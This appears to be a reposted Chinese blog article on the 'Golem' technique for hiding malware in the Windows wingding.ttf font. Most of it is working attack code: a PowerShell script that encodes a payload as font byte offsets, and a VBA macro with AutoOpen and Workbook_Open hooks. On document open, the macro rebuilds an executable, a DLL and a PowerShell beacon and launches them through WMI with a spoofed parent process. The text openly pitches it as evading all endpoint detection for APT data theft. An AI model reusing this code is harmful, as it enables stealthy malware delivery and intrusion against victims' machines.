Golem恶意软件 – 隐藏在Windows字体文件夹中的恶意软件

传统APT攻击的资料外传过程中,不得不需要相应木马的配合.(限定词:传统)

但是,john doe 老哥有言,成也萧何败也萧何,被反制的点也往往体现在木马的相关属性中:

  1. 字符串相关的代码风格聚类识别.
  2. CC回连地址的大网记录抽取.

本文描述了这样一种可能:

  1. 只借由目标操作系统的正常功能实现一款木马.
  2. 木马连一个bit的恶意代码也没有,完完全全就是白的,能过任何终端检测产品的查杀.
  3. 木马执行过程中也不需要额外再下载其他恶意代码.

实现上述3种限定条件制作木马的过程如下:

1.2 步骤

  1. 准备一个各版本操作系统都有的字体文件,比如wingding.ttf.
  2. 准备你的payload.(这个payload当然只在你的机器上).
  3. 关键一步: 找出你的payload的每一个字节在winding.ttf中的位置.(落地在受害者系统上的只是位置信息,所以当然是白的能过查杀了)
  4. 在受害者系统上重组位置信息.马build起来Execute.

1.3 代码

1.3.1 从字体文件挑出payload位置

$Font = "C:\Windows\Fonts\wingding.ttf"
$Malware = "C:\Users\Administrator\Pictures\2.PNG"

$fontArray = Get-Content $Font -Encoding Byte -ReadCount 0
$malwareArray = Get-Content $Malware -Encoding Byte -ReadCount 0
$offsetArray = @()
foreach ($byteInMalware in $malwareArray){
    $index = 0
    foreach ($byteInFont in $fontArray) {
	if ($byteInMalware -eq $byteInFont) {
	    $offsetArray += $index
	    break
	}
	$index++
    }    
}

1.3.2 生成位置信息

$i=0
$payload = ""
$j=0
$u=1
$payDef = ""
foreach($offset in $offsetArray){  

    if($i -eq 30) {
	$payload = $payload + ", " + $offset + " _`r`n"
	$i=0       
	$j++ 
    }
    else {
       if($i -eq 0) {
	$payload = $payload + $offset       
       }
       else {
	$payload = $payload + ", " + $offset       
       }
    }
    if($j -eq 25)  {
	$payDef = $payDef + "`r`nFunction ccc$u()
tt$u = Array($payload)
ccc$u = tt$u
End Function"
	$payload = ""
	$u++
	$j = 0
    }
    $i++
}
if($payload -ne ""){
$payDef = $payDef + "`r`nFunction ccc$u()
tt$u = Array($payload)
ccc$u = tt$u
End Function"
}
$payDef

1.3.3 运行起来

[...] --> you array of bytes containing the position of necessary bytes in the Windings font.


'example to join the bytes for the fist malicious component


    t1 = cc1
    t2 = cc2
    t3 = cc3
    t4 = cc4
    t5 = cc5
    t6 = cc6
    t7 = cc7
    t8 = cc8
    t9 = cc9
    t10 = cc10
    t11 = cc11
    t12 = cc12
    t13 = cc13
    t14 = cc14
    t15 = cc15
    t16 = cc16
    t17 = cc17
    t18 = cc18

    ttt = Split(Join(t1, ",") & "," & Join(t2, ",") & "," & Join(t3, ",") & "," & Join(t4, ",") & "," & Join(t5, ",") & "," & Join(t6, ",") & "," & Join(t7, ",") & "," & Join(t8, ",") & "," & Join(t9, ",") _
     & "," & Join(t10, ",") & "," & Join(t11, ",") & "," & Join(t12, ",") & "," & Join(t13, ",") & "," & Join(t14, ",") & "," & Join(t15, ",") & "," & Join(t16, ",") & "," & Join(t17, ",") & "," & Join(t18, ","), ",")



[...]



    Dim nb As Integer
    Dim nb2 As Integer
    nb = UBound(ttt) - LBound(ttt) + 1 'ttt is a joined byte array
    nb2 = UBound(tt) - LBound(tt) + 1
    nb3 = UBound(ttttttt) - LBound(ttttttt) + 1
    Dim intFileNumber As Integer
    Dim i As Integer
    Dim j As Integer
    Dim lngFileSize As Long
    Dim lngFileSize2 As Long
    Dim strBuffer As String
    Dim strBuffer2 As String
    Dim lngCharNumber As Long
    Dim lngCharNumber2 As Long
    Dim strCharacter As String * 1
    Dim strCharacter2 As String * 1
    Dim strFileName As String
    Dim strFileName2 As String
    Dim offset() As Variant

    strFileName = "C:\Windows\Fonts\wingding.ttf"
    intFileNumber = FreeFile
    Open strFileName For Binary Access Read Shared As #intFileNumber
	lngFileSize = LOF(intFileNumber)
	strBuffer = Space$(lngFileSize)
	Get #intFileNumber, , strBuffer
    Close #intFileNumber

   Dim nFileNum As Long
   Dim sFilename As String
   Dim ind As Long
   sFilename2 = "C:\Users\Public\Documents\changeMyParent.exe" ' crafted binary that will be use to select the parent of rundll32
   sFilename = "C:\Users\Public\Documents\runPoshCode.dll" ' .DLL that will run powershell beacon from an image
   sFilename3 = "C:\Users\Public\Documents\BEACON.ico" ' malicious powershell beacon registered in an .ICO
   nFileNum = FreeFile
   ' a loop would be better 😉
   Open sFilename2 For Binary Lock Read Write As #nFileNum
       For lngCharNumber = 0 To nb - 1
	ind = lngCharNumber + 1
	off = ttt(lngCharNumber)
	strCharacter = Mid(strBuffer, off, 1)
	Put #nFileNum, ind, strCharacter
       Next lngCharNumber
   Close #nFileNum

   nFileNum = FreeFile
   Open sFilename For Binary Lock Read Write As #nFileNum
       For lngCharNumber = 0 To nb2 - 1
	ind = lngCharNumber + 1
	off = tt(lngCharNumber)
	strCharacter = Mid(strBuffer, off, 1)
	Put #nFileNum, ind, strCharacter
       Next lngCharNumber
   Close #nFileNum

   nFileNum = FreeFile
   Open sFilename3 For Binary Lock Read Write As #nFileNum
       For lngCharNumber = 0 To nb3 - 1
	ind = lngCharNumber + 1
	off = ttttttt(lngCharNumber)
	strCharacter = Mid(strBuffer, off, 1)
	Put #nFileNum, ind, strCharacter
       Next lngCharNumber
   Close #nFileNum
   rr
End Sub

Sub rr()
  Dim xx As String
  Dim oihfasf As Object, eopuf As Object, kdj As Object
  Dim oDic As Object, a() As Variant
  Dim pskaf As Integer

  Set oDic = CreateObject("Scripting.Dictionary")

  xx = "."

  Set oihfasf = GetObject("winmgmts:\\" _
      & xx & "\root\CIMV2")
  Set eopuf = oihfasf.ExecQuery _
      ("Select Name, ProcessID FROM Win32_Process", , 48)

  For Each kdj In eopuf
      If (kdj.Properties_("Name").Value) = "explorer.exe" Then
	  pskaf = (kdj.Properties_("ProcessID").Value)
      End If
  Next
Dim t As Date

Dim cnt As Long
Dim arr(2) As Byte

Dim xl As String
xl = "C:\Users\Public\Documents\changeMyParent.exe ""C:\Windows\system32\RunDll32.exe C:\Users\Public\Documents\runPoshCode.dll,ComputeFmMediaType -f C:\Users\Public\Documents\BEACON.ico"" " & pskafxx = "."
Set ow = GetObject("winmgmts:\\" & xx & "\Root\cimv2")
Set os = ow.Get("Win32_ProcessStartup")
Set oc = os.SpawnInstance_
Set op = GetObject("winmgmts:\\" & xx & "\root\cimv2:Win32_Process")
op.Create xl, Null, oc, aslh

End Sub
Sub AutoOpen()
    cc
End Sub
Sub Workbook_Open()
    cc
End Sub

报告链接:http://sysadminconcombre.blogspot.com/2018/11/golem-malware-malware-hiding-in-your.html

发表评论

电子邮件地址不会被公开。 必填项已用*标注